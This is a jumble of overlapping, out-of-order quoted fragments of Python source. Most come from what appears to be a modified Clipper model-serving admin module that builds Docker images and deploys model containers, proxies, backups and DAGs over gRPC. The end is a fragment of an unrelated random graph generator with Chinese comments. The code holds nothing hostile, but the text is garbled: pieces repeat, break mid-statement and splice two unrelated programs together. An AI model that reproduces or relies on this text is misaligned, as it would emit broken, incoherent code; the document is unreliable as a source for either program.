self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy", "from requests.exceptions import RequestException import json import pprint import time", "from .rpc import prediction_pb2 from .rpc import management_pb2 from .rpc", "df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context", "self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id = name+version+str(1)", "file for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version)", "all versions of the specified models. 
This is a convenience", "%s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip =", "self.logger.info(\"Clipper is running\") self.connected = True except ClipperException as e:", "from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException", "[m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( #", "self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ##", "runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\",", "import prediction_pb2 from .rpc import management_pb2 from .rpc import management_pb2_grpc", "model_names : list(str) A list of model names. All replicas", "os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents", "of lower case \" \"alphanumeric characters, '-' or '.', and", "proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s", "requests.exceptions import RequestException import json import pprint import time import", "a model version must be a valid DNS-1123 \" \"", "%s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished", "if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]]", "self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def", "model data from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file,", "image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type,", "self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel", "can also be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers()", "can also be called without calling ``connect`` first. If graceful=False,", "\" \" subdomain. 
It must consist of lower case \"", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0],", "m[\"model_name\"] in model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in", "frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\",", "Docker image to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line)", "image with model data from {}\".format( model_data_path)) image_result, build_logs =", "%s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name,", "lower case \" \"alphanumeric characters, '-' or '.', and must", "b in build_logs: if 'stream' in b and b['stream'] !=", "reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry", "= tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip,", "docker_client = docker.from_env() self.logger.info( \"Building model Docker image with model", "info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info)", "build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs:", "UnconnectedException from .version import __version__, __registry__ from . import graph_parser", "image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not", "runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host))", "= self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container", "# if not self.connected: # raise UnconnectedException() # model_info =", "io import BytesIO as StringIO PY3 = True import grpc", "ip of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name,", "(HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id", "them. You almost certainly want to use one of the", "else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20)", "data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell()", "max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip]", "context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM", "Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip", "be reached request predictions. 
Returns ------- str The address as", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s %s %s %s\"%('1', name,", "still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected", "info for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s", "model_info: # if m[\"model_name\"] in model_names: # if m[\"model_name\"] in", "except ImportError: from StringIO import StringIO PY3 = False else:", "False self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock =", "Kill if it's in the Docker Mode. This parameter will", "is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected", "calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A list of", "# TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s", "= [] proxy_info = [] backup_info = [] count =", "model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected:", "\"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)):", "proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need to", "JSON string containing the current set of metrics for this", "\"\"\"Stops all processes that were started via Clipper admin commands.", "version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version)", "{proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info for tup", "%s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info", "\"\" self.lock = False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name':", "cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not None: image =", "From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path}", "model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd", "\" \"alphanumeric characters, '-' or '.', and must start and", "self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image)) for line in", "# self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') # if(graph_parser.is_stateful(model_info)):", "\"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) #", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting", "input_type, image, labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException()", "model Docker image with model data from {}\".format( model_data_path)) image_result,", "def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of the specified", "base_image, container_registry=None, pkgs_to_install=None): version = str(version) 
_validate_versioned_model_name(name, version) run_cmd =", "0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s", "import logging import docker import tempfile import requests from requests.exceptions", "setting model info to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\",", "google.protobuf.json_format import MessageToDict if sys.version_info < (3, 0): try: from", "self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the", "# Create build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as", "the need to explicitly list all versions of a model", "%s %s %s %s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port,", "time import re import os import tarfile import sys from", "#tells the proxy runtime dag info for tup in proxy_info:", "= df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager", "host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name,", "backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id,", "instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info,", "versions of the specified models. For example, if you have", "= requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: # raise", "\"Stopped all containers for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict)))", "model_dict = {} # for m in model_info: # if", "not self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_ =", "cStringIO import StringIO except ImportError: from StringIO import StringIO PY3", "names of the models whose old containers you want to", "model_names): \"\"\"Stops all model containers serving stale versions of the", "format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size", "graceful=False, Clipper will issue Docker Kill if it's in the", "self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops", "print_function import logging import docker import tempfile import requests from", "self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict", "self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells", "version of each model will be stopped. 
\"\"\" if not", "level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str)", "you have deployed versions 1, 2, and 3 of model", "self.connected = True self.logger.info( \"Successfully connected to Clipper cluster at", "%(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d]", "\"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException(", "else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp =", "query frontend can be reached request predictions. Returns ------- str", "\" subdomain. It must consist of lower case \" \"alphanumeric", "= expanded_dag # TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s", "labels, num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None,", "run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN apt-get -y", "stream=True): self.logger.debug(line) return image def deploy_model(self, name, version, input_type, image,", "# self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model') runtime_dag_id =", "for b in build_logs: if 'stream' in b and b['stream']", "leftover Clipper model containers even if the Clipper management frontend", "host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\",", "# if not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) #", "self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip", "build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version)", "with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host,", "IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas", "\"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo =", "Parameters ---------- model_names : list(str) A list of model names.", "'\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image", "ClipperException( \"Invalid value: {name}: a model name must be a", "proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name,", "!= '\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker", "versions. 
from __future__ import absolute_import, division, print_function

import logging
import docker
import tempfile
import tarfile
import sys
import os
import re
import time

import numpy as np
from google.protobuf.json_format import MessageToDict

if sys.version_info < (3, 0):
    try:
        from cStringIO import StringIO
    except ImportError:
        from StringIO import StringIO
    PY3 = False
else:
    from io import BytesIO as StringIO
    PY3 = True

import grpc
from .rpc import model_pb2_grpc
from .rpc import model_pb2
from .rpc import prediction_pb2_grpc
from .rpc import prediction_pb2
from .rpc import management_pb2_grpc
from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter
from .exceptions import ClipperException, UnconnectedException
from .version import __version__, __registry__
from . import graph_parser

DEFAULT_LABEL = []
DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432
CLIPPER_TEMP_DIR = "/tmp/clipper"  # Used Internally for Test; Not Windows Compatible

logging.basicConfig(
    format='%(asctime)s %(levelname)-8s %(message)s',
    datefmt='%y-%m-%d:%H:%M:%S',
    level=logging.INFO)
# logging.basicConfig(
#     format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
#     datefmt='%y-%m-%d:%H:%M:%S',
#     level=logging.INFO)

logger = logging.getLogger(__name__)

deploy_regex_str = "[a-z0-9]([-a-z0-9]*[a-z0-9])?\Z"
deployment_regex = re.compile(deploy_regex_str)


def _validate_versioned_model_name(name, version):
    if deployment_regex.match(name) is None:
        raise ClipperException(
            "Invalid value: {name}: a model name must be a valid DNS-1123 "
            "subdomain. It must consist of lower case "
            "alphanumeric characters, '-' or '.', and must start and end with "
            "an alphanumeric character (e.g. 'example.com', regex used for "
            "validation is '{reg}'".format(name=name, reg=deploy_regex_str))
    if deployment_regex.match(version) is None:
        raise ClipperException(
            "Invalid value: {version}: a model version must be a valid "
            "DNS-1123 subdomain. It must consist of lower case "
            "alphanumeric characters, '-' or '.', and must start and end with "
            "an alphanumeric character (e.g. 'example.com', regex used for "
            "validation is '{reg}'".format(
                version=version, reg=deploy_regex_str))


class ClipperConnection(object):
    def __init__(self, container_manager):
        self.connected = False
        self.cm = container_manager
        # ...
        self.logger = ClusterAdapter(logger, {
            'cluster_name': self.cm.cluster_identifier
        })

    def start_clipper(
            self,
            mgmt_frontend_image='{}/management_frontend:{}'.format(
                __registry__, __version__),
            # ... (further keyword arguments not recoverable from this dump)
            ):
        try:
            # ... (cluster startup; the readiness probe below is disabled)
            # while True:
            #     try:
            #         query_frontend_url = "http://{host}/metrics".format(
            #             host=self.cm.get_query_addr())
            #         ...
            #         for name, url in [('query frontend', query_frontend_url),
            #                           ('management frontend', ...)]:
            #             r = requests.get(url, timeout=5)
            #             if r.status_code != requests.codes.ok:
            #                 raise RequestException(
            #                     "{name} end...".format(name=name))
            #     except RequestException as e:
            #         self.logger.info("Clipper still initializing: \n {}".format(e))
            #         time.sleep(1)
            self.logger.info("Clipper is running")
            self.connected = True
        except ClipperException as e:
            self.logger.warning("Error starting Clipper: {}".format(e.msg))
            raise e

    def connect_host(self, host_ip, host_port):
        # NOTE: the Docker daemon port is hard-coded here; host_port is
        # accepted but unused.
        self.cm.connect_host(host_ip, "2375")

    def add_model(self, model_name, model_version, image,
                  input_type="string", output_type="string",
                  # ... (remaining parameters not recoverable)
                  ):
        # ... (body not recoverable from this dump)
        pass

    # The DAG deployment path below is a fragment; the method name and the
    # full signature are not recoverable from this dump.
    def deploy_dag(self, name, version, dag_description_):
        nodes = graph_parser.get_all_nodes(dag_description_)
        container_info = []
        proxy_info = []
        backup_info = []
        for model_info in nodes:
            # ... (one model container plus one proxy is started per node)
            proxy_ip = self.cm.get_container_ip(host, proxy_id)
            proxy_info.append([proxy_name, proxy_id, proxy_ip])
            container_info.append([container_name, container_id, container_ip])
            if graph_parser.is_stateful(model_info):
                backup_name, backup_id, backup_host = self.cm.add_replica(
                    model_name, model_version, "22222", model_image)
                # ... (logs backup_name, backup_id, backup_host)
                backup_ip = self.cm.get_container_ip(backup_host, backup_id)
                # backup_proxy_name, backup_proxy_id = ...
                # ... (a gRPC call forwards the model info to the backup
                #      proxy; its trailing arguments are
                #      backup_info[-1][2], "22222")
                self.logger.info(
                    '[DEPLOYMENT][Backup] Finished setting model info to proxy')

        # ... (the frontend container runs on the local host)
        frontend_ip = self.cm.get_container_ip("localhost", frontend_container_id)
        frontend_info = [frontend_name, frontend_container_id, frontend_ip]
        self.logger.info("[DEPLOYMENT] ################")

        # expand the dag description with the model/proxy instances info
        expanded_dag = graph_parser.expand_dag(
            dag_description_, name, version, container_info,
            proxy_info, frontend_info)
        self.runtime_dag = expanded_dag
        # TODO: need to modularize
        # self.cm.grpc_client("zsxhku/grpcclient",
        #                     "--addruntimedag %s %s %s %s %s %s ...")
        for tup in backup_info:
            if tup:
                self.cm.grpc_client(
                    "zsxhku/grpcclient",
                    "--setdag %s %s %s" % (tup[-1], "22223", expanded_dag))
                self.logger.info(
                    '[DEPLOYMENT][Backup] Finished setting '
                    'DAG for proxy {proxy_name} '.format(proxy_name=tup[-1]))
        return

    def inspect_instance(self):
        """Fetches performance metrics from the running Clipper cluster.

        Returns
        -------
        str
            The JSON string containing the current set of metrics for this
            instance.
        """
        # ...

    def deploy_model(self, name, version, input_type, model_data_path,
                     base_image, labels=None, container_registry=None,
                     num_replicas=1, batch_size=-1, pkgs_to_install=None):
        # ... (builds the image and starts replicas; the registration call
        #      is disabled in this fork)
        # self.register_model(
        #     name,
        #     version,
        #     input_type,
        #     image=image,
        #     labels=labels,
        #     batch_size=batch_size)
        self.logger.info("Done deploying model {name}:{version}.".format(
            name=name, version=version))

    def build_model(self, name, version, model_data_path, base_image,
                    container_registry=None, pkgs_to_install=None):
        version = str(version)
        _validate_versioned_model_name(name, version)

        run_cmd = ''
        if pkgs_to_install:
            run_as_lst = ('RUN apt-get -y install build-essential && pip '
                          'install'.split(' '))
            run_cmd = ' '.join(run_as_lst + pkgs_to_install)
        with tempfile.NamedTemporaryFile(
                mode="w+b", suffix="tar") as context_file:
            # Create the build context tarfile.
            with tarfile.TarFile(
                    fileobj=context_file, mode="w") as context_tar:
                context_tar.add(model_data_path)
                # From https://stackoverflow.com/a/740854/814642
                try:
                    df_contents = StringIO(
                        str.encode(
                            "FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
                            format(
                                container_name=base_image,
                                data_path=model_data_path,
                                run_command=run_cmd)))
                except TypeError:
                    df_contents = StringIO(
                        "FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
                        format(
                            container_name=base_image,
                            data_path=model_data_path,
                            run_command=run_cmd))
                df_tarinfo = tarfile.TarInfo('Dockerfile')
                df_contents.seek(0, os.SEEK_END)
                df_tarinfo.size = df_contents.tell()
                df_contents.seek(0)
                context_tar.addfile(df_tarinfo, df_contents)
            # Exit the TarFile context manager to finish the tar file.
            # Seek back to beginning of file for reading.
            context_file.seek(0)
            image = "{cluster}-{name}:{version}".format(
                cluster=self.cm.cluster_identifier, name=name, version=version)
            if container_registry is not None:
                image = "{reg}/{image}".format(
                    reg=container_registry, image=image)
            docker_client = docker.from_env()
            self.logger.info(
                "Building model Docker image with model data from {}".format(
                    model_data_path))
            image_result, build_logs = docker_client.images.build(
                fileobj=context_file, custom_context=True, tag=image)
            for b in build_logs:
                if 'stream' in b and b['stream'] != '\n':
                    self.logger.info(b['stream'].rstrip())

        return image

    def stop_models(self, model_names):
        """Stops all versions of the specified models.

        This is a convenience method to avoid the need to explicitly list
        all versions of a model when calling
        :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`.

        Parameters
        ----------
        model_names : list(str)
            A list of model names. All replicas of all versions of each
            model will be stopped.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        """
        # if not self.connected:
        #     raise UnconnectedException()
        # model_info = ...
        # ...
        # self.logger.info("Stopped all containers for these models and "
        #                  "versions:\n{}".format(pp.pformat(model_dict)))

    def stop_versioned_models(self, model_versions_dict):
        """Stops the specified versions of the specified models.

        Parameters
        ----------
        model_versions_dict : dict(str, list(str))
            For each entry in the dict, the key is a model name and the
            value is a list of model versions that you want to stop. All
            replicas for each version of each model will be stopped.

        Note
        ----
        This method will stop the currently deployed versions of models if
        you specify them. You almost certainly want to use one of the other
        stop_* methods. Use with caution.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        """
        # if not self.connected:
        #     raise UnconnectedException()
        # ...

    def stop_inactive_model_versions(self, model_names):
        """Stops all model containers serving stale versions of the
        specified models.

        For example, if you have deployed versions 1, 2, and 3 of a model
        and version 3 is the current version, this method will stop all
        containers serving versions 1 and 2 but will leave containers
        serving version 3 untouched.

        Raises
        ------
        :py:exc:`clipper.UnconnectedException`
        """
        if not self.connected:
            raise UnconnectedException()
        # ...

    def stop_all_model_containers(self):
        """Stops all model containers started via Clipper admin commands.

        This method can be used to clean up leftover Clipper model
        containers even if the Clipper management frontend or Redis is no
        longer running.
        """
        self.cm.stop_models()
        # ...

    def stop_all(self, graceful=True):
        """Stops all processes that were started via Clipper admin commands.

        This includes the query and management frontend Docker containers
        and all model containers. If you started Redis independently, this
        will not affect Redis. It can also be used to stop the entire
        Clipper cluster in Kubernetes.

        Parameters
        ----------
        graceful : bool
            If True, Clipper tries to shut down the containers gracefully
            first. If graceful=False, Clipper will issue Docker Kill if it's
            a Docker cluster.
        """
        self.cm.stop_all(graceful=graceful)
        self.logger.info(
            "Stopped all Clipper cluster and model containers")
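The in-memory build-context trick in build_model (a Dockerfile written straight into a tar archive, then built with custom_context=True) is easy to get wrong around sizes and seeks. Below is a minimal, self-contained sketch of the same pattern using the Docker SDK for Python; the `alpine` base image, the `hello.txt` payload, and the `demo-context:latest` tag are illustrative assumptions, and a local Docker daemon is assumed to be running.

import os
import tarfile
import tempfile
from io import BytesIO

import docker  # Docker SDK for Python


def build_from_memory():
    # Pack a Dockerfile plus one data file into a tar archive and build
    # an image from it, without ever touching a context directory on disk.
    with tempfile.NamedTemporaryFile(suffix='.tar') as context_file:
        with tarfile.TarFile(fileobj=context_file, mode='w') as tar:
            dockerfile = BytesIO(b"FROM alpine\nCOPY hello.txt /model/\n")
            info = tarfile.TarInfo('Dockerfile')
            dockerfile.seek(0, os.SEEK_END)
            info.size = dockerfile.tell()  # TarInfo.size must be set by hand
            dockerfile.seek(0)
            tar.addfile(info, dockerfile)

            payload = BytesIO(b"hello\n")
            payload_info = tarfile.TarInfo('hello.txt')
            payload_info.size = len(payload.getvalue())
            tar.addfile(payload_info, payload)
        context_file.seek(0)  # rewind so Docker reads the whole archive

        client = docker.from_env()
        image, build_logs = client.images.build(
            fileobj=context_file, custom_context=True,
            tag='demo-context:latest')
        for line in build_logs:
            # Each log entry is a dict; 'stream' carries the build output.
            if 'stream' in line and line['stream'] != '\n':
                print(line['stream'].rstrip())
        return image


if __name__ == '__main__':
    build_from_memory()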
[ "self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i", "edge_num): for i in range(edge_num): mid = random.randint(1, self.n-2) st", "else: count = 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1:", "i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for", "\" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" +", "有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed", "= list() for i in range(n): for j in range(n):", "1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted ==", "loop self.trim = trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环", "loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed =", "else: result = result.dot(temp) for i in range(self.n): for j", "directed self.weighted = weighted self.connected = connected self.loop = loop", "else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) + random.randint(1,", "= numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected =", "mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def", "numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m,", "range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def", "i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count)", "for i in range(self.n-1): if i==0: result = temp.dot(temp) else:", "for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1", "count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n): for", "weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted", "count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in", "RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid = random.randint(1, self.n-2)", "random.randint(1, self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1)", "result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self,", "__init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\"", "i in range(self.n): for j in range(self.n): if result[i][j]==0 and", "self.weighted = weighted self.connected = connected self.loop = loop self.trim", "in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i", "str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return", "有向性 connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始", "str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) +", "\"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid =", "j in range(self.n): if result[i][j]==0 and i!=j: return False return", "i==0: result = temp.dot(temp) else: result = result.dot(temp) for i", "if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list()", "\"\"\"检查图的弱连通性\"\"\" def 
CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n):", "while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st =", "(i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for", "and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m = m", "n self.m = m self.matr = numpy.zeros((n, n)) self.topo =", "= result.dot(temp) for i in range(self.n): for j in range(self.n):", "random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count", "= m self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo)", "self.n = n self.m = m self.matr = numpy.zeros((n, n))", "range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1:", "if self.weighted == False: return str(self.edges[i][0]) + \" \" +", "result.dot(temp) for i in range(self.n): for j in range(self.n): if", "for j in range(self.n): if result[i][j]==0 and i!=j: return False", "= self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for", "if self.weighted == False: return str(self.edges[i][0]+1) + \" \" +", "self.weighted == False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1)", "= copy.deepcopy(self.matr) for i in range(self.n): for j in range(self.n):", "= n self.m = m self.matr = numpy.zeros((n, n)) self.topo", "= list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1)", "self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i", "weak_connected = self.CheckWeakConnectivity() if 